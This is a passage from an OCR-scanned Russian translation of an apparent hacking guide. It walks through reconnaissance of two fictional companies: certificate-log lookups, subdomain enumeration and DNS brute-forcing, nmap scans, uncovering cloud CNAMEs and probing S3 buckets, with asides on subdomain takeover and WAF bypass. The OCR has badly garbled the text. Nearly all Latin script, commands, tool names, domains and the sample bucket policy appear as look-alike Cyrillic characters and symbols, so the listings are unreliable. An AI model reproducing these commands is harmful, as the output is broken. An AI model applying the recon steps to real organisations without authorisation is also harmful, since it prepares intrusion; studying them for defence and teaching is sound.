мы получаем эти уникальные ОВІ-адреса: 

® Гогпа(-(гие-у1.да.еим/1.тахга@$.сот; 

• Чазп-у5-Бета.отезсЬроНЯсо.сот; 

® үгүгуү.5игуеуѕапазѕїаїѕ.сот/9а#6с8а6758635#ға0ғ1 73... 


Мы тестируем их в браузере. Срок действия первой ссылки ис- 
тек, а вторая перенаправляет на страницу аутентификации Соое 
(рис. 4.5). 


© Ѕідп тмин бооде 


Ѕідп іп 


То соп тие їо СгеїѕсһРС 550 


Епїег уошг етай (@дгеїѕсһроійісо.сот 


Рис. 4.5. Ссылка для входа, найденная во фрагменте файла журнала Сгеіѕсћ Ро!їїісо 
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Стеїѕсһ РоНЧсо, очевидно, подписывается на приложения Соо- 
$е У/огкзрасе (ранее С ЗиКе) для управления своей корпоративной 
электронной почтой и, вероятно, своим пользовательским каталогом 
и внутренними документами. Мы учтем это позже, когда начнем со- 
бирать данные. 

Третий ОВІ-адрес выглядит еще более многообещающе (рис. 4.6). 


в Сеї апогу еаѕі1у? 


Ѕігопдіу Адгее 


Адгее 


М№ейќћег Адгее пог Оіѕадгее 


Рис. 4.6. Во фрагменте файла логов нашлась ссылка на опрос МХВ Аа 


Должно быть, это один из тех опросов, которые МХК Айѕ использует 
для сбора, казалось бы, безобидной информации о людях. Попытка 
обмануть МХВ АЯ или Сгеіѕсһ Ро!ібісо с помощью одной из их соб- 
ственных форм весьма заманчива, но мы все еще находимся в разгаре 
нашей разведывательной работы, поэтому давайте просто отметим 
этот факт для использования в будущем. 


Извлечение веб-доменов 


Пассивная разведка пока дала нам не так уж много точек входа. Я счи- 
таю, что пришло время серьезно начать раскапывать все домены 
и поддомены, связанные с МХЕ Аа и Стеїѕсћ Ро!їбісо. Я уверен, что мы 
можем найти гораздо больше, чем три жалких веб-сайта, случайно за- 
бытых во фрагменте файла на Сіѕї. Надеюсь, мы окажемся на забро- 
шенном веб-сайте со скрытой уязвимостью, поджидающей нас внутри. 

Мы начнем наш поиск, сначала проверив журналы сертификатов 
для субдоменов. 


Информация из сертификатов 


Сепѕуѕ (лёрѕ;//сепѕуѕ.і0/) – это инструмент, который регулярно скани- 
рует журналы сертификатов, чтобы собирать все недавно выпущен- 
ные сертификаты ТТ, и он занимает первое место в списке инстру- 
ментов для обнаружения доменов у любого пентестера. После выдачи 
центром сертификации все сертификаты помещаются в центральный 
репозиторий, который называется журналом сертификатов. Этот ре- 
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позиторий хранит бинарное дерево всех сертификатов, где каждый 
узел является хешем своих дочерних узлов, что гарантирует целост- 
ность всей цепочки. Это примерно тот же принцип, которому следу- 
ет блокчейн биткойна. Теоретически все выданные сертификаты ТІ.5 
должны быть опубликованы для обнаружения подмены домена, опе- 
чаток, гомографических атак и других злонамеренных способов об- 
мана и перенаправления пользователей. 

Мы можем просматривать эти журналы сертификатов, чтобы по- 
лучать любые новые регистрации, соответствующие определенным 
критериям, например «тахг айѕ». Уродливая сторона этого прекрас- 
ного холста заключается в том, что все имена доменов и поддоменов 
находятся в открытом доступе в интернете. Благодаря этому легко 
обнаруживаются секретные приложения с низким уровнем безопас- 
ности, скрытые за малоизвестными доменами. Такие инструменты, 
как Сепѕуѕ и сг*.5Н, изучают эти журналы сертификатов и помогают 
ускорить составление списка субдоменов как минимум на порядок – 
жестокое напоминание отом, что даже в самых сладких ягодах иногда 
скрываются очень горькие зерна. На рис. 4.7 мы используем Сепѕуѕ 
для поиска поддоменов етеіѕсһро!іісо.сот. 


Вед! {ег 
а дгеїѕсһроЇйісо.соті Ѕідп п 


а О0=ротаіп СопігоЇ Маііааїеа, О0=бапаі Ѕїапаага М/Иасага $51, 
СМ№=*.дгеїѕсһроіїісо.сот 


Сапаї Ѕїапаага $51 СА 2 
2019-04-29 - 2020-05-13 


$ *.дгезспро!со.сот, .дгеїѕсһроійісо.согт 


Рис. 4.7. Поиск поддоменов с помощью Сепѕуѕ 


А вот и результат. Похоже, что СР не удосужилась зарегистриро- 
вать сертификаты поддоменов и вместо этого выбрала сертификат 
с подстановочными знаками: общий сертификат, который соответ- 
ствует любому поддомену. Один сертификат, чтобы управлять ими 
всеми. Является ли это блестящим ходом по обеспечению безопас- 
ности или чистой ленью, факт в том, что мы не можем продвинуться 
дальше верхнего домена. Мы пытаемся использовать другие домены 
верхнего уровня в Сепѕуѕ – отеїѕсһроїісо.іо, тхгайѕ.іесһ, гахгайѕ.сот, 
етеїѕсһроібісо.пемѕ ит. д., - нотак же безрезультатно. Наш список до- 
менов вырос на увесистый жирный ноль... но не отчаивайтесь! У нас 
припрятаны и другие козыри в рукавах. 


Конечно, подстановочные сертификаты представ- 
ляют собой другую проблему безопасности: это единая точка отказа. 
Если мы наткнемся на закрытый ключ во время поиска в сети компа- 
нии, мы можем перехватить поток связи абсолютно всех приложений, 
использующих тот же родительский домен. 
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Поиск в интернете 


Если сертификаты не помогли нам составить список поддоменов, 
то, возможно, руку помощи протянет интернет. Зи 1$(3г – отличный 
и простой в использовании инструмент, который собирает поддоме- 
ны из разных источников: поисковых систем, Раѕѕіуер № и даже Үі- 
га$То{а1. Сначала мы скачиваем инструмент из официального репо- 
зитория и устанавливаем требования: 


гооЁ@Роіпї1:~/# ді сопе ВЕЁре: / /9іЁҺиЬ. сот/абои131а/5061153г 
гооЁ@Роіпё1:5и6/# руёһоп -м рір іпѕЁа11 -г гедиігетепіѕ. х 


Затем мы приступаем к поиску поддоменов, как показано в лис- 
тинге 4.1. 


Листинг 4.1. Составление списка доменов с помощью ѕиБ!їѕ1Зг 


гооЁ@Роіпї1:~/# руЕһоп зи 11 $Зг.ру -4 дгеёѕсһро\і+ісо. сом 
[-] Епумега*пд ѕиБдотаіпѕ пом Рог дгеёѕсһро11+ісо.сот 
[-] Ѕеагсһіпд пом іп Ваіаџ. . 

[-] Ѕеагсһіпд пом іп Үаһоо. . 

[-] Ѕеагсһіпд пом іп № сгай.. 

[-] Ѕеагсһіпд пом іп О№итрѕїег.. 

- сокращено - - 

[-] Ѕеагсһіпд пом іп ТһгеаСгома. . 

[-] Ѕеагсһіпд пом іп Раѕѕімер№.. 

[-] Тоба1 Уплаче ЅиБаотаіпѕ Ғоџпа: 12 
дазНБоаг4 . дгеЁѕсһро1іісо. сом 

т.дгеёѕсһро1і+ісо.сот 

- сокращено - - 


Мы нашли 12 поддоменов, так что это обнадеживает. Бьюсь об за- 
клад, с тхга4ѕ.сот нам повезет еще больше. Они, в конце концов, ме- 
диакомпания. Однако многократное использование одних и тех же 
инструментов и методов может наскучить. Для домена тгхайѕ.сот 
давайте воспользуемся другим инструментом для выполнения клас- 
сической атаки методом грубой силы с использованием известных 
ключевых слов поддоменов, таких как ѕїаеіпе.тхгайѕ.сот, һеір.тх- 
гайѕ.сот, іеу.тхгадѕ.сот ит. д. Есть несколько инструментов, которые 
пригодны для такой работы. 

Атаѕѕ (ћр5://дһир.сот/ОИАЅР/Атаѕ5/) из проекта Ореп Мер Арріі- 
саїіоп Ѕесигіїу Ртгојесі (ОМАЅР) написан на Со]апе и искусно исполь- 
зует средства языка для распараллеливания нагрузки О№5-запросов. 
В то время как большинство других инструментов Руіћоп полага- 
ются на резолвер 0№ для извлечения доменов путем вызова таких 
функций, как ѕоскеї. деіћоѕЁпате, Атаѕѕ создает О№$-запросы с нуля 
и отправляет их на различные О№5-серверы, что позволяет избежать 
узких мест, вызванных использованием одного и того же локального 
резолвера. С другой стороны, Атаѕѕ переполнен множеством иных 
красочных функций, таких как визуализация и 3)-графики, поэтому 


Правильная атака в киберпространстве 7 3 


иногда возникает ощущение, что вы замахиваетесь кувалдой, чтобы 
почесать спину. Заманчиво, но есть более легкие альтернативы. 

Менее навороченный, но очень мощный инструмент, который 
я очень рекомендую, - это Еегите]4ег (Р#р$//айпиь.сот/еа/ет- 
те[ег/). Он написан на С, состоит всего из нескольких сотен строк 
кода и, вероятно, является самым эффективным инструментом пе- 
ребора ОМ$, который я когда-либо пробовал. ЕегптеІӣег принимает 
на вход два типа данных: список имен-кандидатов О№ и ІР-адреса 
резолверов ОМ№ для использования. Это все, что от нас требуется. 

Во-первых, мы создаем наш список возможных О№ 5-имен, исполь- 
зуя магию аик, примененную к общедоступному списку слов субдо- 
мена, как показано в листинге 4.2. Хорошим началом станет утилита 
5есГ1${5 Даниэля Мисслера, доступная по адресу №Ёр5//айпир.сот/аап- 
іеітіеѕ51ег/5есі 1515. 


Листинг 4.2. Создание списка потенциальных субдоменов МХК Аа 


гоо@Роіпё1:~/# амик *{ргіп $1”.мхгад$.сот”}” фор-10000.+хе > ѕиЬ пхгайѕ.ЁхЕ 
гооё@РоіпЁ1:~/# һеаа ѕиЬ мхгайѕ.ЕхЕ 

Ееѕі.тхгайѕ. соп 

Пето. тхгайѕ. сот 

уійео.тхгайѕ .сот 

- - сокращено- - 


Мы получаем несколько тысяч потенциальных поддоменов, кото- 
рые можем попробовать. Что касается второго входа, вы можете поза- 
имствовать резолверы рМ“ из репозитория Ееготе4ет, как показано 
в листинге 4.5. 


Листинг 4.3. Проверка наших кандидатов на субдомен, чтобы узнать, 
какие из них реально существуют 


гоої@Роіпї1:~/# ді с1опе ВЕЁрз: //9іЕһиЬ. сом/Ееа1 В /Регпме\дег 
гоо{@Ро\пЕ1 : -Регп/# таке 


гоо{@Ро\пЕ1 : -Регп/# саф зи6_мхг.Ехе | ./егпме\4ег -4 -№ 1.1.1.1 \ 
-№ 8.8.8.8 \ 

-№ 64.6.64.6 \ 

-№ 77.88.8.8 \ 

-№ 74.82.42.42 \ 

-№ 1.0.0.1 \ 

-№ 8.8.4.4 \ 

-№ 9.9.9.10 \ 

-№ 64.6.65.6 \ 

-№ 77.88.8.1 \ 


Будьте осторожны при добавлении новых резолверов, так как не- 
которые О№-серверы ведут себя недостойно и при разрешении не- 
существующего домена возвращают ІР-адрес по умолчанию, а не 


74 глава 4 


стандартный ответ МХООМАТМ. Параметр -А в конце команды скрывает 
любые неудачные попытки разрешения домена. 

Результаты из листинга 4.3 начинают поступать впечатляюще 
быстро. Из тысячи поддоменов, которые мы пытались разрешить, не- 
сколько десятков ответили действительными ІР-адресами: 


Ѕибдотаіп ТТІ С1аѕ5 Туре Вдафа 
е1есігоп.тхгайѕ.пе. 60 ІМ№ А 18.189.47.103 
сіі .тхгайѕ.пеЁ. 60 1 А 18.189.39.101 
паеѕіго.тхгайѕ.пеі. 42 ІМ№ А 35.194.3.51 
Ғ1Леѕ.тхгайѕ.пеї. 5 И А 205.251.246.98 
ѕадіпдЗ.тхгайѕ.пеё. 60 ІМ А 10.12.88.32 

9 .пхгад$ .пеф. 60 1 А 54.241.52.191 
еггогѕ.тхгайѕ.пеё. 59 ІМ№ А 54.241.134.189 
јіга.тхгайѕ.пеї. 43 ІМ А 54.232.12.89 
--Ѕпір- - 


Наблюдение за появлением ІР-адресов на экране просто заворажи- 
вает. Каждый адрес - это дверь, ожидающая, когда ее ловко вскроют 
или взломают силой, чтобы предоставить нам доступ. Вот почему эта 
фаза разведки так важна: она дает нам роскошь выбора, ведь обеим 
организациям принадлежит более 100 доменов! 


ШЗ 3 Ознакомьтесь с интересным инструментом АПап$, 
который использует цепи Маркова для формирования предсказуемых 
кандидатов в поддомены: ћїірѕ;//ӯйһир.сот/іпјоѕес-аи/аіапѕ/. 


Исследование используемой веб-инфраструктуры 


Традиционный подход заключается в выполнении запросов МНОІЅ 
для этих вновь найденных доменов, из которых мы можем опреде- 
лить сегмент ІР-адресов, принадлежащий компании. Затем мы мо- 
жем просканировать открытые порты в этом диапазоне, с помощью 
№ тар или Маззсап, в надежде проникнуть в базу данных без аутен- 
тификации или плохо защищенную систему Міпаомѕ. Мы пробуем 
запросы М/НОГ$ на нескольких поддоменах: 


гооє@Роіпі1:~/# мһоіѕ 54.232.12.89 
М№е+Капде: 54.224.0.0 - 54.239. 255,255 
СІРА: 54.224.0.0/12 

№е{Маме: АМА20№- 20111 

ОгдМате: Атахоп Тесһпо10діеѕ Іпс. 
ОгдІй: АТ-88-7 


Однако, внимательно изучив этот список ІР-адресов, мы быстро 
понимаем, что они не имеют ничего общего с Огеіѕсһ Роііісо или 
МХК Аа. Выяснилось, что большинство собранных нами поддоменов 
работают в инфраструктуре АМ. Это важный вывод. Большинство 
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интернет-ресурсов на АМ, таких как балансировщики нагрузки, сети 
распространения контента, бакеты $3 и т. д., регулярно меняют свои 
ЇР-адреса. 


Сеть распространения контента (сотепЕ йіѕігірийоп 
пеѓиогк, СОМ) – это набор географически распределенных прокси-серве- 
ров, которые помогают уменьшить задержку конечного пользователя 
и обеспечить высокую доступность. Обычно они обеспечивают локаль- 
ное кеширование, направляют пользователей к ближайшему серверу, 
направляют пакеты по кратчайшему пути и предлагают другие услуги. 
Среди наиболее известных игроков – СІоиаћаге, Акатаі и АИ СІоиаЕгопі. 


Это означает, что если мы отправим этот список ІР-адресов в Мтар 
и сканирование портов затянется более чем на пару часов, адреса уже 
будут присвоены другому клиенту, и результаты уже не будут акту- 
альны. Конечно, компании всегда могут привязать фиксированный 
ТР-адрес к серверу и напрямую раскрыть свое приложение, но это все 
равно, что намеренно уронить чугунную гирю прямо себе на мизинец. 

За последнее десятилетие мы, хакеры, привыкли сканировать толь- 
ко [Р-адреса и пропускать резолвинг О№, чтобы выиграть несколько 
секунд, но при работе с облачным провайдером это может оказаться 
фатальным. Вместо этого мы должны сканировать доменные имена; 
таким образом, резолвинг имени будет выполняться ближе к факти- 
ческому сканированию, чтобы гарантировать его актуальность. 

Именно этим мы и займемся дальше. Мы запускаем быстрое ска- 
нирование М№тар для всех доменных имен, которые мы собрали до 
сих пор, для поиска открытых портов: 


гооё@РоіпЁ1:~/# птар -Е -5У -11 Яотаіпѕ.Ёхі -оА Ғаѕ геѕи1+ѕ 


Мы фокусируемся на наиболее распространенных портах с по- 
мощью -Е, получаем версию компонента с помощью -5\/ и сохраняем 
результаты в ХМГ, КАМ и текстовом формате с помощью -0А. Это ска- 
нирование может занять несколько минут, поэтому, пока оно выпол- 
няется, мы обратим внимание на фактическое содержимое сотен до- 
менов и веб-сайтов, которые, как мы обнаружили, принадлежат МХК 
Ааѕ и Стеїѕсһ РоП@со. 


Дополнительные ресурсы 


• Ознакомьтесь с примером утечки учетных данных, прочитав отчет 
об ошибке исследователя, обнаружившего токены АРІ в репозито- 
рии, принадлежащем ЅїагрисКѕ: ћі1рѕ;//ћаскегопе.сот/'ерогіѕ5/716292/. 

• Если вы незнакомы с устройством и принципом работы СИ, прочи- 
тайте статью Юрия Стрампфлонера (Јигі Зхгитрорпег) по адресу 
һіірѕ //игіѕїгсот/0109/2013/04/9ії-ехріаіпеа/. 


ПОИСК УЯЗВИМОСТЕЙ 


У нас есть около 150 направлений для изучения уязвимо- 

стей: внедрение кода, выход за пределы разрешенного 

каталога, ошибки контроля доступа и так далее. Хаке- 

ры, плохо знакомые с этим типом деятельности, часто 
чувствуют себя ошеломленными огромным количеством 
возможностей. С чего начать? Сколько времени следует про- 
водить на каждом сайте? На каких страницах? Что, если мы что-то 
пропустим? 

Этот этап наверняка способен поколебать вашу уверенность. В дан- 
ной книге я покажу вам как можно больше кратчайших путей, но по- 
верьте мне, что для этой конкретной задачи самый древний рецепт 
в мире - самый эффективный: чем больше вы практикуетесь, тем 
лучше у вас получается. Чем более фантастическими и невероятными 
уязвимостями вы воспользуетесь, тем больше у вас появится уверен- 
ности не только в себе, но и в неизбежности человеческих ошибок. 


Практика - залог совершенства 


Итак, с чего начать? Что ж, выполнение задач в виде игры с захватом 
флага! (сарѓиге-ће-Пае, СТЕ) – это один из способов освоить самые 


' Название позаимствовано у традиционной игры бойскаутов, в которой 


нужно любым способом проникнуть в лагерь противника и похитить его 
флаг и/или оставить свой. - Прим. перев. 
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основные принципы эксплойтов, таких как 5ОГ-инъекции, межсай- 
товый скриптинг (сгоѕѕ-5іќе ѕсгірііпе, Х5$) и другие веб-уязвимости. 
Но имейте в виду, что эти упражнения мало похожи на реальные уяз- 
вимости приложений; они были разработаны энтузиастами как за- 
бавные головоломки, а не как результат настоящей ошибки или лени- 
вого копирования-вставки из поста на сайте Ѕаск ОуегЕом. 

Лучший способ изучить эксплойты - попробовать их в безопасной 
среде. Например, для экспериментов с 501-инъекциями вы можете 
развернуть в своей лаборатории веб-сервер и базу данных, написать 
приложение и попробовать внедрить в него зловредный $01-запрос. 
Вам придется изучить тонкости разных парсеров 501, написать свои 
фильтры для предотвращения инъекций, а затем попробовать обойти 
эти фильтры и так далее. Начните думать как разработчик, попробуй- 
те решить проблему анализа неизвестных входных данных для по- 
строения запроса к базе данных или сохранения информации между 
устройствами и сеансами, и вы быстро обнаружите, что делаете те же 
самые опасные предположения, жертвами которых становятся разра- 
ботчики. Не зря говорят, что за каждой серьезной уязвимостью скры- 
вается ложное предположение. Для экспериментов подойдет любой 
стек: Арасһе + РНР, М№еіпх + Б]апго, Моде] 5 + Еігебаѕе и так далее. Уз- 
найте, как использовать эти платформы, разберитесь, где они хранят 
настройки и секреты, и определите, как они кодируют или фильтруют 
пользовательский ввод. 

Со временем вы разовьете способность замечать не только потен- 
циально уязвимые параметры, но и то, как ими оперирует приложе- 
ние. Ваше мышление изменится с «Как мне заставить это работать?» 
на «Как я могу это сломать?». Как только эта шестеренка начнет вра- 
щаться у вас в голове, вы не сможете ее остановить - уж поверьте мне. 

Я также призываю вас старательно учиться на чужом опыте. Я по- 
лучаю огромное удовольствие от чтения отчетов об ошибках, которы- 
ми делятся исследователи в Тміїѓег, Меаіит и на других платформах, 
таких как ћіірѕ;//репіеѕіегІапаӣ. Вы не только откроете для себя новые 
инструменты и методы, но и убедитесь, что даже огромные корпо- 
рации совершают нелепые ошибки в простейших базовых функциях, 
таких как формы сброса пароля. 

К счастью, сейчас вы не занимаетесь тестированием на проник- 
новение по контракту, поэтому время будет наименьшей из ваших 
проблем. На самом деле это ваш самый ценный союзник. Вы можете 
потратить на каждый сайт столько времени, сколько сочтете нужным. 
Возможность провести целый день, играя с разными параметрами, 
зависит только от вашего чутья и любопытства. 


Выявление скрытых доменов 


Вернемся к списку доменов, который мы получили в прошлой гла- 
ве. При работе с полностью облачной средой есть кратчайший путь, 
который поможет нам узнать больше о веб-сайтах и действительно 
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определить их приоритеты: мы можем выявить реальные домены, 
скрывающиеся за общедоступными доменными именами. Постав- 
щики облачных услуг обычно создают уникальные ОВГ-адреса для 
каждого ресурса, созданного клиентом, например серверов, балан- 
сировщиков нагрузки, хранилищ, управляемых баз данных и конеч- 
ных точек распространения контента. Возьмем, к примеру, АКата!, 
глобальную сеть доставки контента. Для обычного сервера Акатаі 
создаст доменное имя наподобие е9657.Ь.акатаіейде.пеї, чтобы оп- 
тимизировать передачу пакетов на этот сервер. Но ни одна компания 
не станет использовать этот труднопроизносимый домен на публике; 
его спрячут за гламурным именем типа ѕёе1 Паг .пхгайѕ.соп или уіс- 
ёогу.дгеёѕсһро11Ёсо. соп. Браузер может думать, что он связывается 
с сайтом уісёогу.дгеёѕсһро1іЁісо. сом, но на самом деле сетевой па- 
кет отправляется на ІР-адрес е9657.Ь.акатаіейде.пеї, который затем 
пересылает пакет в конечный пункт назначения. 

Если мы сможем каким-то образом выяснить эти облачные имена, 
скрытые за каждым из найденных нами веб-сайтов, мы сможем опре- 
делить облачный сервис, на платформе которого работают веб-сайты, 
и, таким образом, сосредоточиться на тех сервисах, которые с боль- 
шей вероятностью будут иметь неправильную конфигурацию: Акатаі 
хорош, но АМ 53 (сервис хранения данных) и АРІ Саѓеуау (управляе- 
мый прокси-сервер) более интересны, как вы скоро увидите. Если мы 
знаем, что веб-сайт находится за балансировщиком нагрузки прило- 
жений АМ, например, то мы можем ожидать некоторую фильтрацию 
параметров и, следовательно, корректировать наши полезные на- 
грузки. Что еще интереснее, мы можем попытаться найти «исходный» 
или реальный ІР-адрес сервера и, таким образом, полностью обойти 
промежуточную облачную службу. 


Найти реальные ІР-адреса сервисов, защищенных 
АКатаі, СІоийћаге, СІоиаЕгопё и другими сетями доставки контента, 
непросто. Иногда ІР просачивается в сообщениях об ошибках, иногда 
в заголовках НТТР. В других случаях, если вам сопутствует удача и сер- 
вер имеет достаточно уникальный иифровой отпечаток, вы можете 
найти его с помощью $ћойап, 2оотЕуе или специального инструмента, 
такого как СіІоийВиппу (ћрѕ://9йһир.сот/Магїор/СіоиаВиппу/). 


Давайте вернемся к нашему списку доменов и продвинемся в раз- 
ведке "№ еще на один шаг, чтобы найти эти скрытые домены. Нам 
следует искать записи СМАМЕ (записи имен, которые указывают на 
другие записи имен), а не [Р-адреса (как это делают более распростра- 
ненные записи типа А). Команда дефеп{ Во${$ извлекает следующие 
записи СМАМЕ: 


гооЁ@Роіпї1:~/# дефепЕ Во$$ Вог.тхга4$. сом 
91.152.253.4 е9657.Ь.акатаіейде.пеї ѕ&е1Лаг.тхгайѕ.сот 
ѕе1 Лаг .тхгайѕ.сот.ейдекеу.пеё 
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Мы видим, что Ног .пхга4$ . сот действительно находится за точкой 
доставки контента АКатла1. 

Не все альтернативные домены зарегистрированы как записи 
СМАМЕ; некоторые создаются как записи АША$, которые явно не 
отображаются в процессе разрешения имен. В этих сложных случа- 
ях мы можем угадать сервис А\М5, найдя ІР-адрес в общедоступном 
диапазоне, опубликованном в документации А\М$ в разделе Сепега1 
Кеѓегепсе (Общая информация). 

Мне не удалось найти простой инструмент для расширенной раз- 
ведки ОМ такого типа, поэтому я написал скрипт для автоматиза- 
ции процесса – №5 Сһагіѕ, который можно скачать по адресу ћі1р5;// 
апѕсһагїѕ.һаскіікеарогпѕїагсот/. Вы создаете список доменов, а затем 
передаете его в 0№ Сһагіѕ для поиска записей СМАМЕ с использова- 
нием регулярных выражений, чтобы сгенерировать предположения 
о названиях облачных сервисов. Результат отображается в виде цвет- 
ного графика, на котором показаны базовые взаимодействия между 
доменами, а также основные облачные сервисы, используемые ком- 
панией. На рис. 5.1 показан пример вывода ОМ$ Сһагіѕ. 


© дкатаі (25) м АМ5 Сіоиаїгопі (78) Ө дз Ф ДИМ ЕВ (77) 
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Рис. 5.1. Список сервисов, используемых МХК Ааѕ 


Беглый взгляд на этот график дает нам довольно четкое представ- 
ление о наиболее интересных конечных точках, на которые следует 
ориентироваться в первую очередь. Большинство найденных нами 
доменов размещены на А\МГ5 и используют сочетание следующих сер- 
висов: сеть доставки СІоиџаЕгопі, служба хранения Ататоп 53 и балан- 
сировщик нагрузки ЕІВ. Остальные используют дистрибьюторскую 
сеть АКатаі. 

Обратите внимание, что ОВТ-адрес панели инструментов СР (ввер- 
ху в центре) указывает на домен, принадлежащий МХК Аа$ (внизу 
слева). Мы были правы насчет их близких отношений; это даже отра- 
жено в их инфраструктуре. 

У нас есть несколько зацепок. Например, поддомен дгеїѕсһрої1- 
а16-1463804911.еџ-меѕї-1... относится к балансировщику нагрузки 
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приложений АМ (АМҮ АТВ), о чем говорит элемент а ОВТ-адреса. 
Согласно документации А\5, это балансировщик нагрузки уровня 7, 
который отвечает за распределение входящего трафика. Теорети- 
чески балансировщик нагрузки уровня 7 способен анализировать 
НТТР-запросы и даже блокировать некоторые полезные нагрузки при 
подключении к брандмауэру веб-приложений АМҮ (АУГЅ МАЕ). Так ли 
это на самом деле, остается открытым вопросом и, конечно, потребу- 
ет активного расследования. 


ШЗ 8 АИ’ ИАР - это не тот великолепный МАЕ, которого 
все ждали. Время от времени появляется твит с описанием простого 
способа обхода: Һ1р;//і.1у/3з03арто. 


Однако балансировщик нагрузки приложения может подождать. 
Мы уже составили список победителей, как только увидели граф. Мы 
начнем с наиболее заманчивых ОВІ-адресов АМ 53. 


Изучение УВ! -адресов 53 


А\МГ$ 53 – это недорогой сервис хранения с высокой избыточностью, 
предоставляемый Ататоп по цене от 0,023 долл. за гигабайт плюс пе- 
редача данных. Объекты, хранящиеся в $3, организованы в бакеты 
(бисКкеї, корзина). У всех учетных записей АМ/$ каждый бакет имеет 
уникальное имя и ОВТ-адрес (см. рис. 5.2). 


$3 Бискеїѕ 
О ѕеагсһ ғогБискеїѕ АП ассеѕѕ їуреѕ 
4 Сгеае Бискеї 9 Воск 
Вискеї пате ~ Ассеѕѕ Ө ~ Ведіоп ~ 
& опідие-Бискеї-пате-3 $ Еаѕї (М. Уіго 


Рис. 5.2. Бакет хранилища 53, как он отображается в веб-консоли 


55 может хранить что угодно, от файлов Јауа$сгірі до резервных 
копий баз данных. После стремительного внедрения этого сервиса 
многими компаниями, как небольшими, так и крупными, на собра- 
ниях можно было часто слышать о каком-нибудь файле: «О, просто 
закиньте его на $3!» 

Такая концентрация легкодоступных данных в интернете привле- 
кает хакеров, как цветущая клумба пчел, и, конечно же, как скром- 
ные, так и крутые компании одинаково дают поводы для скандальных 
заголовков в журналах. Открытые и уязвимые бакеты 53 обходятся 
этим компаниям в терабайты конфиденциальных данных, таких как 
информация о клиентах, история транзакций и многое другое. Взлом 
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компании еще никогда не был таким простым. Вы даже можете найти 
список открытых бакетов 53 на ћіїрѕ;//искеіѕ.дгауһаїуагјаге.сот/. 

Наш небольшой граф О№ на рис. 5.1 показывает, что у нас есть 
четыре ОВІ-адреса $53, а именно 91.мхга4$.сом, піѕс.птхгайѕ. сот, аѕ- 
ѕеіѕ.тхгайѕ.соп и гезоигсе.тхга4$ .сот, но на самом деле там может 
быть больше информации. Прежде чем исследовать эти бакеты, мы их 
проредим. Иногда Акатаі и СІоџаЕгопі могут скрывать бакеты $3 за 
записями АШАЅ. Давайте будем аккуратными, пройдемся по 18 ОВГ- 
адресам АКата! и СочаЕгопЕ и внимательно присмотримся к пара- 
метру Ѕегмег в ответе НТТР: 


гоо{@Ро\пЕ1:-/# мһіЛе геаа р; до \ 
есһо $р, $(сиг1 --5ЦепЕ -Т -1 ВЕр$://$р | дгер Ама2оп53) \ 
бопе <с1оџдҒгопё_акатаі_ѕиБаотаіпѕ . Ех 


аідіба1- јѕ.тхгайѕ.сот, бегуег: Атагоп53 
ѕёгеатіпо.тхгайѕ.сот, Ѕегуег: Ата2оп53 


У нас есть еще два бакета, заслуживающих внимания. Отлично. 
Введем в браузер ОВТ-адрес первого бакета, 1 .тхгайѕ. сот (псевдо- 
ним для тхгайѕ - Ғ\1еѕ.53.еџ-меѕі-1.атагопамѕ. соп), надеясь получить 
доступ ко всему, что хранится в бакете. К сожалению, мы сразу полу- 
чаем пощечину в виде явной ошибки: 


у <Еггог> 

<Соӣе>Ассеѕѕрепіеӣ</Сойе> 
<Меѕѕаре>Ассеѕѕ репіеа</Меѕѕаре> 
<КедиеѕТІа>ғ9С81080ЕёЕ509607<‹/ВедиеѕїІа> 

у <Ноѕ+тІа» 

№м4уСс1Мо9һ1АХсіОКумаб2200@еү0усасхкАМІЅУМ.ОмАеіугІѕАКас1#461Е7+566а1ЕпЕКТ+ТӘ= 

</НоѕёІа» 

</Еггог> 


Ассеѕѕ йепіей – в доступе отказано. 


Вопреки этому сообщению, технически нам не запрещено обра- 
щаться к объектам в бакете. Нам просто не разрешено получать спи- 
сок содержимого бакета – очень похоже на то, как параметр Орііопѕ 
- Тпдехе$ на сервере Арасһе отключает список каталогов. 


Иногда бакет удаляют, но СМАМЕ остается опреде- 
ленным. В этом случае мы можем попытаться захватить поддомен, 
создав бакет с таким же именем в нашей собственной учетной записи 
АИ/5. Это интересный прием, который в некоторых ситуациях может 
иметь фатальные последствия для жертвы. Об этом есть хорошая 
статья Патрика Худака на №Нр5.//Охрак.сот/акеоуег-ргоо5/. 


Безопасность бакета 53 


После слишком большого количества скандалов, связанных с не- 
безопасными бакетами 53, АМ/Ѕ ужесточила контроль доступа по 
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умолчанию. Каждый бакет теперь имеет своего рода переключатель 
доступа, который пользователь может легко активировать, чтобы за- 
претить любой публичный доступ. Может показаться, что это базовая 
функция, но! – доступом к бакету управляют не одна, не две, не три, 
а четыре перекрывающиеся настройки под переключателем! Слегка 
запутанно, правда? Пользователей бакетов $3 можно почти простить 
за неправильную конфигурацию, которая состоит из следующих на- 
строек: 


• списки контроля доступа (ассеѕѕ сопїтоЇ 11515, АСГ). Явные 
правила, определяющие, какие учетные записи АМ могут полу- 
чить доступ к каким ресурсам (устарело); 


• совместное использование ресурсов из разных источников 
(Сгоѕѕ-Огіғіп Кеѕоигсе Ѕһагіпғ, СОВ). Правила и ограничения, 
накладываемые на НТТР-запросы, исходящие из других доме- 
нов, которые можно фильтровать на основе строки пользова- 
тельского агента запроса, метода НТТР, ІР-адреса, имени ресурса 
ит. д.; 

• политика бакета (иске! роПсу). Документ описания объектов 
ЈауаЅсгірї (]5ОМ) с правилами, указывающими, какие действия 
разрешены, кем и при каких условиях. Политика бакета теперь 
заменяет АСТ, в качестве номинального способа защиты бакета; 


• политики управления идентификацией и доступом (Ійепіі- 
ту апа Ассеѕѕ Мапагетепт, ІАМ). Аналогичны политикам баке- 
тов, но эти документы ]5ОМ присоединяются к пользователям/ 
группам/ролям, а не к бакетам. 


Вот пример политики бакета, которая позволяет всем желающим 
получить объект из бакета, но запрещает любые другие операции 
с бакетом, такие как просмотр его содержимого, запись файлов, из- 
менение политики ит. д.: 


{ 
"Мег$\1оп" : "2012-10-17", 
"ЅЕаёемеп" : [ 
{ 
"514" : "ОпіаџеІр", // ТО политики 
"ЕРҒесЕ" : "А Лом", // Предоставляет доступ при соблюдении условий 
"Ргіпсіра1": "*", // Применимо ко всем (анонимным или нет) 
"Асёіоп":["53:бе0Ьјесё"], // Операция 53 для просмотра файла 
"Везоигсе" : ["агп:амѕ:53:::Бискеёпате/*"] // Все файлы в бакете 
} 
] 
} 


АМҮЅ объединяет правила из этих четырех параметров, чтобы ре- 
шить, принимать входящий запрос на операцию или нет. Над этими 
четырьмя параметрами стоит главный переключатель В1осК рибИс 
ассез$ (Блокировать общий доступ), который при включении блоки- 
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рует весь общий доступ, даже если он явно разрешен одним из четы- 
рех базовых параметров. 

